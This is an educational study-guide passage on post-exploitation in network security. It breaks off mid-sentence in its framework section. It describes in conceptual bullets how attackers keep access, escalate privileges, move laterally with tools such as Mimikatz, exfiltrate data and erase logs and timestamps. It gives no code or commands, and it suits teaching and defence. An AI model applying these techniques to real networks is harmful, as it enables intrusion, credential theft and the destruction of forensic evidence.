Post-exploitation is a critical phase in network security, focusing on actions taken after gaining initial access to a system. It involves maintaining access, escalating privileges, and moving laterally through the network to achieve the attacker's objectives.

This topic covers key aspects of post-exploitation, including persistence mechanisms, privilege escalation techniques, lateral movement strategies, and data exfiltration methods. Understanding these concepts is crucial for both offensive and defensive security professionals.

Maintaining access

• Maintaining access is a crucial aspect of post-exploitation in network security, allowing attackers to retain control over compromised systems
• Involves deploying various techniques and tools to ensure persistent access to the target network, even if the initial entry point is discovered or patched
• Enables attackers to continue their malicious activities, gather sensitive data, and potentially use the compromised system as a launching pad for further attacks

Backdoors and trojans

• Backdoors provide unauthorized access to a system, allowing attackers to bypass normal authentication mechanisms (remote access trojans)
• Trojans disguise themselves as legitimate software but contain malicious code that grants attackers control over the infected system
• Backdoors and trojans can be installed through various means, such as phishing emails, exploiting vulnerabilities, or social engineering tactics
• Once installed, they establish a covert communication channel between the attacker and the compromised system
• Examples of famous backdoors and trojans include Back Orifice, SubSeven, and ZeuS

Rootkits and bootkits

• Rootkits are malicious software designed to hide the presence of other malware or unauthorized activities on a compromised system
• They operate at a low level, often modifying the operating system kernel or critical system files to evade detection by security software
• Bootkits are a type of rootkit that infects the master boot record (MBR) or unified extensible firmware interface (UEFI), allowing them to persist even after the operating system is reinstalled
• Examples of rootkits include the Sony BMG rootkit scandal and the Stuxnet worm, which employed a rootkit component

Persistence mechanisms

• Persistence mechanisms ensure that the attacker's access to the compromised system survives reboots, system updates, or user interventions
• Common persistence techniques include modifying system startup files (registry keys, init scripts), installing service or daemon processes, and hijacking legitimate system binaries
• Attackers may also use scheduled tasks or cronjobs to execute malicious code at predetermined intervals
• Application-level persistence can be achieved by hooking into popular software, such as web browsers or productivity tools, to maintain access
• Examples of persistence mechanisms include the use of "run keys" in the Windows registry and the creation of hidden user accounts with administrative privileges

Privilege escalation

• Privilege escalation is the process of exploiting vulnerabilities or misconfigurations to gain higher-level permissions on a compromised system
• Attackers seek to escalate privileges to access sensitive data, install additional malware, or perform actions that require administrative rights
• Privilege escalation can be classified into vertical and horizontal escalation, depending on the scope and nature of the elevated privileges

Vertical privilege escalation

• Vertical privilege escalation involves gaining higher privileges within the same user or process context
• Attackers exploit vulnerabilities in the operating system, applications, or misconfigurations to elevate their privileges from a low-level user to an administrator or root
• Common techniques include exploiting unpatched software vulnerabilities, abusing sudo misconfiguration, and leveraging insecure setUID binaries
• Examples of vertical privilege escalation include the DirtyCow vulnerability in Linux systems and the Windows kernel exploits used by the WannaCry ransomware

Horizontal privilege escalation

• Horizontal privilege escalation involves gaining access to resources or user accounts that are at the same privilege level as the attacker's current user
• Attackers may exploit misconfigurations, weak access controls, or steal credentials to access other user accounts or resources within the same network segment
• Techniques used in horizontal privilege escalation include exploiting file and folder permissions, abusing shared resources, and conducting pass-the-hash attacks
• An example of horizontal privilege escalation is the use of the Mimikatz tool to extract and reuse user credentials from the memory of a compromised system

Kernel exploits

• Kernel exploits target vulnerabilities in the operating system kernel to gain unrestricted access to the system
• Successful exploitation of a kernel vulnerability can lead to complete system compromise, as the kernel operates with the highest privileges
• Attackers may use publicly available exploit code or develop custom exploits to target specific kernel versions and configurations
• Examples of famous kernel exploits include the EternalBlue exploit used in the WannaCry and NotPetya ransomware attacks, and the Dirty COW vulnerability in Linux systems

Social engineering tactics

• Social engineering tactics can be employed to trick users into disclosing their credentials or granting elevated permissions to the attacker
• Attackers may pose as legitimate users, such as system administrators or IT support personnel, to convince victims to share sensitive information or perform actions that compromise security
• Phishing emails, spear-phishing, and voice phishing (vishing) are common social engineering techniques used to obtain user credentials or trick users into installing malware
• An example of social engineering for privilege escalation is an attacker impersonating an IT helpdesk employee and convincing a user to grant remote access to their system

Lateral movement

• Lateral movement refers to the techniques attackers use to navigate and expand their access within a compromised network
• Once an initial foothold is established, attackers seek to move laterally to other systems, escalate privileges, and gain access to sensitive data or critical assets
• Lateral movement allows attackers to maintain persistence, evade detection, and increase the impact of their attack

Network scanning and enumeration

• Network scanning involves using tools to discover and map the target network, identifying live hosts, open ports, and running services
• Enumeration techniques gather information about the compromised systems, such as user accounts, network shares, and system configurations
• Attackers may use port scanning tools (Nmap), vulnerability scanners (Nessus), and network discovery tools (Responder) to gather information and identify potential targets for lateral movement
• Example: An attacker using Nmap to scan the internal network, discovering a vulnerable file server that can be exploited to gain a foothold in another network segment

Pivoting techniques

• Pivoting involves using a compromised system as a gateway to access and attack other systems within the network that are not directly accessible from the attacker's machine
• Attackers may use tools like Metasploit's Meterpreter, SSH tunneling, or SOCKS proxies to route their traffic through the compromised system and reach otherwise inaccessible targets
• Pivoting allows attackers to bypass network segmentation, firewalls, and other security controls that limit direct access to certain parts of the network
• Example: An attacker compromising a web server in the DMZ and using it as a pivot point to access and exploit systems in the internal corporate network

Pass-the-hash attacks

• Pass-the-hash attacks exploit the weakness in the authentication protocols that rely on hashed user credentials for authentication (NTLM, LM)
• Attackers capture the hashed credentials from the memory of a compromised system and reuse them to authenticate to other systems without needing the plaintext password
• Tools like Mimikatz and Windows Credential Editor (WCE) can extract hashed credentials from the memory of a running system
• Example: An attacker using Mimikatz to extract the NTLM hash of a domain administrator from a compromised workstation and using it to access and control other systems in the domain

Remote desktop protocol (RDP) hijacking

• RDP hijacking involves taking over an existing RDP session or creating a new unauthorized RDP connection to a target system
• Attackers may exploit vulnerabilities in the RDP protocol, use stolen credentials, or perform man-in-the-middle attacks to gain unauthorized access to remote systems
• Once connected, attackers can interact with the remote system as if they were sitting in front of it, allowing them to perform various malicious activities and move laterally within the network
• Example: An attacker using a tool like TScon to hijack an existing RDP session of a logged-in user, gaining access to their system and any resources they have access to

Data exfiltration

• Data exfiltration is the unauthorized transfer of sensitive data from a compromised system or network to an attacker-controlled location
• Attackers may steal intellectual property, customer data, financial information, or other valuable assets to sell on the black market, use for blackmail, or gain a competitive advantage
• Data exfiltration can occur through various channels, such as network-based transfers, physical media, or covert communication methods

Network-based exfiltration

• Network-based exfiltration involves transferring data over the compromised network using common protocols like HTTP, HTTPS, FTP, or DNS
• Attackers may use tools like Wget, Curl, or custom scripts to upload stolen data to remote servers or cloud storage services
• Data can be compressed, encrypted, or split into smaller chunks to avoid detection by network-based security controls
• Example: An attacker using DNS tunneling to exfiltrate sensitive documents by encoding them into DNS queries and sending them to a domain under their control

Physical media exfiltration

• Physical media exfiltration involves copying stolen data onto removable storage devices, such as USB drives, external hard drives, or optical discs
• Attackers may use malware or scripts to automatically search for and copy sensitive files onto the connected storage devices
• Social engineering tactics can also be employed to trick employees into plugging in malicious USB drives or transferring data onto attacker-provided media
• Example: An attacker using a tool like USB Thief to automatically copy selected files from a compromised system onto a connected USB drive when it is inserted

Covert communication channels

• Covert communication channels are used to exfiltrate data in a manner that is difficult to detect or distinguish from legitimate traffic
• Attackers may use techniques like steganography, where data is hidden within images, videos, or other file formats, to avoid raising suspicion
• Other covert channels include using legitimate services like social media platforms, email, or instant messaging to transfer data in small, inconspicuous pieces
• Example: An attacker using a steganography tool to embed stolen credit card numbers into an image file and posting it on a public image-sharing platform

Steganography and data hiding

• Steganography is the practice of concealing data within another file format, such as images, audio, or video files, to avoid detection
• Data hiding techniques can also involve using alternate data streams (ADS) in file systems, hiding data in unused disk space, or leveraging file system attributes
• Attackers may use steganography to exfiltrate sensitive information, deliver malware payloads, or establish covert communication channels
• Example: An attacker using a tool like OpenStego to hide a confidential document within an innocuous-looking JPEG image and sending it via email to an external recipient

Covering tracks

• Covering tracks, also known as anti-forensics, involves techniques used by attackers to hide their activities, delete evidence, and make it difficult for investigators to trace their actions
• Attackers aim to evade detection, maintain access to compromised systems, and prevent forensic analysis from attributing the attack to them
• Common techniques for covering tracks include log tampering, timestomping, removing artifacts, and employing anti-forensics tools

Log tampering and deletion

• Log tampering involves modifying or deleting system logs, security event logs, or application logs to remove any evidence of the attacker's activities
• Attackers may use tools or scripts to selectively delete log entries related to their actions, such as login attempts, file access, or network connections
• Log deletion can be performed using built-in system utilities (Event Viewer, log rotation scripts) or specialized tools designed to wipe logs securely
• Example: An attacker using a PowerShell script to clear the Windows Security Event Log and the PowerShell command history to hide their traces

Timestomping

• Timestomping is a technique used to modify the timestamps of files, directories, or other system artifacts to mislead investigators about when the malicious activities occurred
• Attackers can change the creation, modification, or access timestamps of files to match those of legitimate files or to a time before the attack took place
• Timestomping can be performed using built-in system commands (touch, PowerShell) or specialized tools (Timestomp, Transmogrify)
• Example: An attacker using the Timestomp tool to modify the timestamps of a malware executable to match those of a legitimate system file, making it appear as if the malware had been present on the system for a long time

Removing artifacts and evidence

• Removing artifacts and evidence involves deleting or securely wiping files, directories, registry entries, or other system components that could reveal the attacker's presence or actions
• Attackers may use secure deletion tools to overwrite the contents of files before deleting them, preventing recovery through forensic techniques
• Other artifacts that may be removed include temporary files, browser history, command history, or cached data
• Example: An attacker using the SDelete tool from Microsoft Sysinternals to securely overwrite and delete a directory containing stolen data before exfiltrating it from the compromised system

Anti-forensics techniques

• Anti-forensics techniques are designed to interfere with or mislead forensic analysis, making it difficult for investigators to reconstruct the attacker's actions or gather evidence
• Attackers may use encryption to protect their tools, communication channels, or stolen data, rendering them inaccessible to forensic examiners without the proper decryption keys
• Other anti-forensics techniques include using memory-resident malware (fileless malware) that leaves no traces on the disk, or employing obfuscation and packing to hide the true nature of malicious code
• Example: An attacker using a memory-only version of the Mimikatz tool to extract credentials from a compromised system, leaving no traces on the disk for forensic analysts to discover

Command and control (C2)

• Command and control (C2) refers to the infrastructure and communication channels used by attackers to control compromised systems, distribute commands, and exfiltrate data
• C2 servers act as the central hub for managing the compromised systems (bots or zombies) and orchestrating the attack campaign
• Attackers employ various C2 architectures, protocols, and techniques to establish and maintain control over the compromised systems while evading detection

Centralized vs decentralized C2

• Centralized C2 architectures rely on a single or a few central servers to control the compromised systems, providing a single point of failure but easier management for the attacker
• Decentralized C2 architectures distribute the control among multiple servers or use peer-to-peer (P2P) communication, making it more resilient to takedowns but harder to coordinate
• Hybrid C2 architectures combine elements of both centralized and decentralized models, using a tiered approach with multiple layers of C2 servers
• Example: A botnet using a centralized C2 server to distribute commands to the compromised systems, while a more sophisticated APT group employs a decentralized P2P model to maintain control even if some of the C2 nodes are discovered and taken down

Common C2 protocols and tools

• Attackers use various protocols for C2 communication, ranging from common ones like HTTP, HTTPS, and DNS to more obscure or custom protocols to evade detection
• Some common C2 tools include Cobalt Strike, Empire, Metasploit, and Pupy, which provide a range of features for managing compromised systems and executing commands
• Other C2 mechanisms involve using legitimate web services (Dropbox, Google Drive) or social media platforms (Twitter, Reddit) to blend in with normal traffic and avoid raising suspicion
• Example: An attacker using the Cobalt Strike framework to establish a C2 channel over HTTPS, encrypting the communication and making it appear as normal web traffic to network security monitoring tools

Domain fronting and redirection

• Domain fronting is a technique used to obscure the true destination of C2 traffic by using a legitimate domain as a front, making it appear as if the traffic is going to a benign service
• Attackers leverage the fact that some CDNs (Content Delivery Networks) and cloud services share the same underlying infrastructure, allowing them to route C2 traffic through a legitimate domain and then redirecting it to the actual C2 server
• Domain fronting makes it difficult for network security controls to block the C2 traffic without also blocking access to the legitimate service
• Example: An attacker using domain fronting with Amazon CloudFront to hide their C2 traffic, making it appear as if the compromised systems are communicating with a legitimate website hosted on AWS

Detecting and preventing C2 traffic

• Detecting C2 traffic involves a combination of network monitoring, behavioral analysis, and threat intelligence to identify suspicious communication patterns and known C2 indicators
• Network security controls like firewalls, intrusion detection/prevention systems (IDS/IPS), and web proxies can be configured to detect and block known C2 protocols and destinations
• Machine learning and anomaly detection techniques can help identify unusual network behavior that may indicate the presence of C2 activity
• Preventing C2 traffic also involves securing the endpoints, applying security patches, and educating users to reduce the risk of initial compromise
• Example: A security team using a network threat analytics platform to detect anomalous DNS queries and identifying a group of compromised systems communicating with a known C2 domain, allowing them to isolate the affected systems and prevent further damage

Post-exploitation frameworks

• Post-exploitation frameworks are software tools and libraries that provide a set of functionalities and modules to facilitate the post-exploitation phase of an attack
• These frameworks offer a wide range of features, such as privilege escalation, lateral movement, data exfiltration, and persistence mechanisms, making it easier for attackers to perform various actions on compromised systems
• Some popular post-exploitation frameworks include Metasploit Framework, Empire, PowerShell Empire, and Cobalt Strike, each with its own strengths and use cases

Metasploit Framework

• Metasploit Framework is a widely-used open-source post-exploitation framework that provides a comprehensive set of tools and modules for exploiting vulnerabilities, deploying payloads,